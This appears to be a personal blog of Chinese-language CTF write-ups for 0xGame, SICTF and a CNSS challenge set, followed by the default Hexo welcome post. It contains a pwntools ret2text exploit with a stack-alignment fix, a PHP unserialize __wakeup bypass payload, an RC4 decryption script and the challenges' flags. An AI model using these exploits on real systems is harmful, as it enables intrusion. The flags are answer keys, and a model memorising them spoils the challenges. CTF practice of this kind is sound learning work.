post @ 2023-10-21

week1

Re

数字筑基

else
  {
    sub_401020((char *)&byte_402210, Arglist[0]);
    v4 = "0xGame{5f4812eb-6dee-46ab-9910-92af643cd911}\n";
  }
  sub_401020(v4, Arglist[0]);
  system("pause");
  return 0;
}
0xGame{5f4812eb-6dee-46ab-9910-92af643cd911}

代码金丹

v3 = strcmp(Arglist, "0xGame{620bbfcb-e56f-4e6d-8069-9587e066130a}");
if ( v3 )
  v3 = v3 < 0 ? -1 : 1;
v4 = (char *)&unk_4021B0;
if ( !v3 )
  v4 = (char *)&byte_40217C;
sub_401020(v4, Arglist[0]);
0xGame{620bbfcb-e56f-4e6d-8069-9587e066130a}

网络元婴

mov     [rsp+1F0h+var_1D0], 30h ; '0'
mov     [rsp+1F0h+var_1CC], 78h ; 'x'
xor     ebx, ebx
mov     [rsp+1F0h+var_1C8], 47h ; 'G'
mov     [rsp+1F0h+var_1C4], 61h ; 'a'
mov     [rsp+1F0h+var_1C0], 6Dh ; 'm'
mov     [rsp+1F0h+var_1BC], 65h ; 'e'
mov     [rsp+1F0h+var_1B8], 7Bh ; '{'
mov     [rsp+1F0h+var_1B4], 37h ; '7'
mov     [rsp+1F0h+var_1B0], 31h ; '1'
mov     [rsp+1F0h+var_1AC], 30h ; '0'
mov     [rsp+1F0h+var_1A8], 37h ; '7'
mov     [rsp+1F0h+var_1A4], 65h ; 'e'
mov     [rsp+1F0h+var_1A0], 65h ; 'e'
mov     [rsp+1F0h+var_19C], 62h ; 'b'
mov     [rsp+1F0h+var_198], 38h ; '8'
mov     [rsp+1F0h+var_194], 2Dh ; '-'
mov     [rsp+1F0h+var_190], 36h ; '6'
mov     [rsp+1F0h+var_18C], 37h ; '7'
mov     [rsp+1F0h+var_188], 31h ; '1'
mov     [rsp+1F0h+var_184], 39h ; '9'
mov     [rsp+1F0h+var_180], 2Dh ; '-'
mov     [rsp+1F0h+var_17C], 34h ; '4'
mov     [rsp+1F0h+var_178], 39h ; '9'
mov     [rsp+1F0h+var_174], 38h ; '8'
mov     [rbp+0F0h+var_170], 32h ; '2'
mov     [rbp+0F0h+var_16C], 2Dh ; '-'
mov     [rbp+0F0h+var_168], 61h ; 'a'
mov     [rbp+0F0h+var_164], 30h ; '0'
mov     [rbp+0F0h+var_160], 33h ; '3'
mov     [rbp+0F0h+var_15C], 64h ; 'd'
mov     [rbp+0F0h+var_158], 2Dh ; '-'
mov     [rbp+0F0h+var_154], 39h ; '9'
mov     [rbp+0F0h+var_150], 38h ; '8'
mov     [rbp+0F0h+var_14C], 35h ; '5'
mov     [rbp+0F0h+var_148], 33h ; '3'
mov     [rbp+0F0h+var_144], 30h ; '0'
mov     [rbp+0F0h+var_140], 33h ; '3'
mov     [rbp+0F0h+var_13C], 33h ; '3'
mov     [rbp+0F0h+var_138], 35h ; '5'
mov     [rbp+0F0h+var_134], 64h ; 'd'
mov     [rbp+0F0h+var_130], 66h ; 'f'
mov     [rbp+0F0h+var_12C], 39h ; '9'
mov     [rbp+0F0h+var_128], 33h ; '3'
mov     [rbp+0F0h+var_124], 7Dh ; '}'
0xGame{7107eeb8-6719-4982-a03d-98530335df93}

虚拟化神

这里的逻辑是检测 config.txt 的值是不是 1：等于 1 就输出 flag，所以直接把 config.txt 中的值改成 1 即可

while ( v5 );
fopen_s(&Stream, "config.txt", "r");
if ( Stream && (fgets(Buffer, 2, Stream), fclose(Stream), atoi(Buffer) == 1) )
{
  vfprintf1((char *)&byte_1400032B8);
  vfprintf1("%s\n", (const char *)v10);
}
else
{
  vfprintf1((char *)&byte_1400032E0);
  scanf("%s");
  if ( !strcmp(v15, (const char *)v10) )
  {
    fopen_s(&Stream, "config.txt", "w");
    vfprintf(Stream, "%d", (va_list)1);
    fclose(Stream);
    vfprintf1(byte_1400032F8);
  }
  else
  {
    fopen_s(&Stream, "config.txt", "w");
    vfprintf(Stream, "%d", 0i64);
    fclose(Stream);
    vfprintf1((char *)&byte_140003328);
  }
}
0xGame{c9fcd83d-e27a-4569-8ba1-62555b6dc6ac}

赛博天尊

这里需要构造一个能跳过 if 判断的输入，这个输入就是 flag；构造方式是解方程，并且有一些很直观的约束条件：flag 长度是 44，求解范围是 0xGame 格式的 flag


今天看一个ret2text的题目的时候,遇到了exp本地不通,远程通的奇怪问题,题目是这样的

有个backdoor函数是这样的

exp是这样的

from pwn import *
# p=remote("1.container.jingsai.apicon.cn",30509)
elf = context.binary = ELF('./Intruduce')
p = process()
context.log_level='debug'
# 40 bytes of padding up to the saved return address (presumably a 32-byte
# buffer plus the 8-byte saved rbp - confirm against the binary).
payload=b'a'* (32 + 8)
# Entry address of the backdoor function; the write-up below explains that
# this address leaves the stack misaligned locally (glibc 2.35), which is
# why this version only works against the remote.
backd00r=0x4011B6
payload+=p64(backd00r)
s=p.recvline() ; print(s)
print(s)  # prints the same line a second time
char=p.recv(1)
print(char)
p.sendline(payload)
p.interactive()

gdb调试了一下，发现在 call system 之后卡在了一条使用 xmm 寄存器的指令上

搜索了一下,在这里找到了解决方法 https://blog.csdn.net/fjh1997/article/details/107695261

发现是 glibc >= 2.27 的时候 system 函数里面会使用 xmm 寄存器，xmm 寄存器要求栈 16 字节对齐；远程的环境应该是 < 2.27 的，所以可以直接打通；而我本地的 glibc 版本是 2.35，所以会因为 xmm 寄存器要求栈对齐的原因导致 exp 打不通，只需要少 push 一个地址，栈就对齐了

一开始我是用4011B6这个地址,后面换成了4011BB就对齐了,然后本地就通了

from pwn import *
# p=remote("1.container.jingsai.apicon.cn",30509)
elf = context.binary = ELF('./Intruduce')
p = process()
context.log_level='debug'
# 40 bytes of padding up to the saved return address (presumably a 32-byte
# buffer plus the 8-byte saved rbp - confirm against the binary).
payload=b'a'* (32 + 8)
# 0x4011BB = 0x4011B6 + 5: enters the backdoor a few bytes past its entry
# (the write-up says this skips one push), so the stack is 16-byte aligned
# by the time system() runs on glibc >= 2.27.
backd00r=0x4011BB # old address 4011B6
payload+=p64(backd00r)
s=p.recvline() ; print(s)
print(s)  # prints the same line a second time
char=p.recv(1)
print(char)
p.sendline(payload)
p.interactive()
post @ 2023-09-18

附件 https://github.com/nyyyddddn/ctf/tree/main/Sictf2023%20%23Round%202

Reverse

[签到]PYC

电脑上的pycdc出问题了,就找个在线的

https://www.lddgo.net/string/pyc-compile-decompile

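# Decompiled body of the pyc: a single print of the flag. Straight quotes
# replace the typographic quotes the blog rendering substituted, which would
# be a SyntaxError if pasted into Python as-is.
print('SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}')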

Myobject

rc4加解密,写个脚本

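def rc4(key, plaintext):
    """XOR ``plaintext`` with the RC4 keystream derived from ``key``.

    RC4 is symmetric, so the same call both encrypts and decrypts.

    Args:
        key: sequence of byte values (0-255), e.g. ``[ord(c) for c in "SIFLAG"]``
            or a ``bytes`` object.
        plaintext: sequence of byte values to transform.

    Returns:
        list[int]: one transformed byte value per input byte.

    Raises:
        ValueError: if ``key`` is empty (``i % len(key)`` would otherwise
            raise a less descriptive ZeroDivisionError).
    """
    key = list(key)
    if not key:
        raise ValueError("rc4: key must not be empty")
    key_len = len(key)

    # Key-scheduling algorithm (KSA): permute S under the key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % key_len]) % 256
        S[i], S[j] = S[j], S[i]

    # Pseudo-random generation algorithm (PRGA): one keystream byte per input byte.
    i = j = 0
    output = []
    for byte in plaintext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        output.append(byte ^ S[(S[i] + S[j]) % 256])

    return output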
# Key bytes recovered from the binary ("SIFLAG") and the three ciphertext
# fragments: two 8-byte little-endian qwords around an 11-byte array.
key = list(b"SIFLAG")
v18_bytes = (0x47CF225A0ED32730).to_bytes(8, byteorder='little')
ciphertext_v19 = [71, 107, 11, 229, 141, 83, 186, 153, 195, 133, 7]
v20_bytes = (0x9F88FE10771C0107).to_bytes(8, byteorder='little')

# Concatenate in memory order (27 bytes in total) and run RC4 over the whole buffer.
full_ciphertext_27 = [*v18_bytes, *ciphertext_v19, *v20_bytes]
decrypted_full_combined = rc4(key, full_ciphertext_27)

# Render the byte values as text and print the recovered string.
decrypted_full_combined_string = ''.join(map(chr, decrypted_full_combined))
print(decrypted_full_combined_string)

SICTF{wow_you_get_the_flag}

chbase

strcpy(Str2, "F0lWEVA7BmUzAGB0C2UuAU9hbnIpATEidDdnACQ9");

/*
 * Decompiler output (IDA-style). Fills the global Destination with a
 * Base64 alphabet - presumably the table the program's decoder uses, since
 * the write-up decodes with the swapped table. First a custom table whose
 * upper-case half runs Z..A is written; then, only when IsDebuggerPresent()
 * reports a debugger, the standard A..Z table is written over it. So a
 * normal run decodes with the custom alphabet and a debugged run with the
 * standard one - an anti-debugging check that silently changes the result.
 *
 * Returns: the result of the second j_strcpy when a debugger is present,
 * otherwise the (zero) IsDebuggerPresent() value cast to char * - a
 * decompiler artifact, not a meaningful pointer.
 */
char *sub_411B30()
{
  char *result; // eax

  __CheckForDebuggerJustMyCode(&unk_41C0F5);   // MSVC debug-build instrumentation
  // Custom table: upper-case letters reversed (Z..A), rest standard.
  j_strcpy(&Destination, "ZYXWVUTSRQPONMLKJIHGFEDCBAabcdefghijklmnopqrstuvwxyz0123456789+/");
  result = (char *)IsDebuggerPresent();
  if ( result )
    // Under a debugger, overwrite with the standard Base64 table.
    return j_strcpy(&Destination, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
  return result;
}

base64换一下上面的索引表就解出来了

http://web.chacuo.net/netbasex

SICTF{base64_and_antidebugger}

不一样的base64

这个出题人怎么对base64情有独钟

pyinstaller打包的exe,我找了几个提取pyc的项目,就这个比较好用

https://github.com/pyinstxtractor/pyinstxtractor-ng/releases/tag/2023.08.20

然后把111.pyc 反编译一下

post @ 2023-09-18

Web

[Baby] SignIn

查看源代码，script.js 文件中有一段 document.getElementById('flag').addEventListener('click', function() ...，下面是一段 jsfuck 混淆

https://enkhee-osiris.github.io/Decoder-JSFuck/ 得到flag

[Baby] Backdoor

post传system()执行系统命令,找到flag

[Baby] Webpack

https://www.cnblogs.com/guowenrui/p/17023732.html 参考的这个文章

安装nodejs 用reverse-sourcemap .map文件还原找到flag

[Easy] Leak

.swp备份文件 vim -r还原得到flag

[Easy] ezhttp

传参的时候有些问题,像传host还有referer,可能是我这边安装的burp有问题,上网上查了一下发现curl也能传很多参数

curl -X CNSS -A "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Build/OPM1.171019.026; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4313 MMWEBSDK/20220604 Mobile Safari/537.36 MMWEBID/8603 MicroMessenger/8.0.24.2180(0x28001851) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64" -H "Referer: cnss.io" -H "X-Forwarded-For: 127.0.0.1" -H "Host: uestc.edu.cn" -H "Content-Type: application/json" -d "{\"name\": \"nyyyddddn\",\"password\" : \"123456\"}" -b "name=nyyyddddn;password=123456" -u nyyyddddn:123456 http://124.221.34.13:50005/Index

[Easy] ezunserialize

网页上 fssmsl 显示异常，是因为字符串里含有 Unicode 的 LRI、PDI、RLO 双向控制字符，在 IDE 里没有这个问题；传参的时候转成 URL 编码传就行了，只需要改序列化里的对象属性数量绕过 __wakeup 就拿到 flag 了

<?php
error_reporting(0);      // suppress warnings/notices in the challenge output
show_source(__FILE__);   // print this file's source to the visitor
include "flag.php";      // presumably defines $flag, read in CNSS::__destruct

class CNSS
{
    // The property defaults are exactly the values __destruct checks for;
    // __wakeup overwrites them on unserialize(), so they only survive when
    // __wakeup does not run.
    public $username = 'admin';
    // This literal contains Unicode bidi control characters (RLO/LRI/PDI)
    // that browsers render out of order; the bytes must match the
    // comparison in __destruct exactly.
    private $i_want2_say = '‮⁦fssmsl⁩⁦i_like_web';
    protected $password = 'ctf';
    
    // Called by unserialize(); resets every property to a non-winning value.
    function __wakeup()
    {
        $this->username = 'guest';
        $this->i_want2_say = 'i_like_web';
        $this->password = '123456';
        echo "<br/> wake up! <br/>";
    }
    
    // Called when the object is destroyed; prints $flag only if all three
    // defaults are still in place.
    function __destruct()
    {
        echo "destruct<br />";
        if ($this->username === 'admin' && $this->password === 'ctf' && $this->i_want2_say === '‮⁦fssmsl⁩⁦i_like_web') { // same bidi-control string as the property default
            global $flag;
            echo $flag;
        } else
            echo "you are 2 baby la<br/>";
    }
}

// Serialize a fresh CNSS (its defaults are the winning values), then change the
// declared property count from 3 to 4 - the __wakeup bypass the write-up uses -
// and URL-encode the result so it can be passed as a request parameter.
$obj = new CNSS();
$serialized = str_replace('"CNSS":3', '"CNSS":4', serialize($obj));
echo urlencode($serialized);

Re

[Baby] Welcome to Reverse World!

main函数那,一打开就有flag了

post @ 2023-09-18

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

$ hexo new "My New Post"

More info: Writing

Run server

$ hexo server

More info: Server

Generate static files

$ hexo generate

More info: Generating

Deploy to remote sites

$ hexo deploy

More info: Deployment
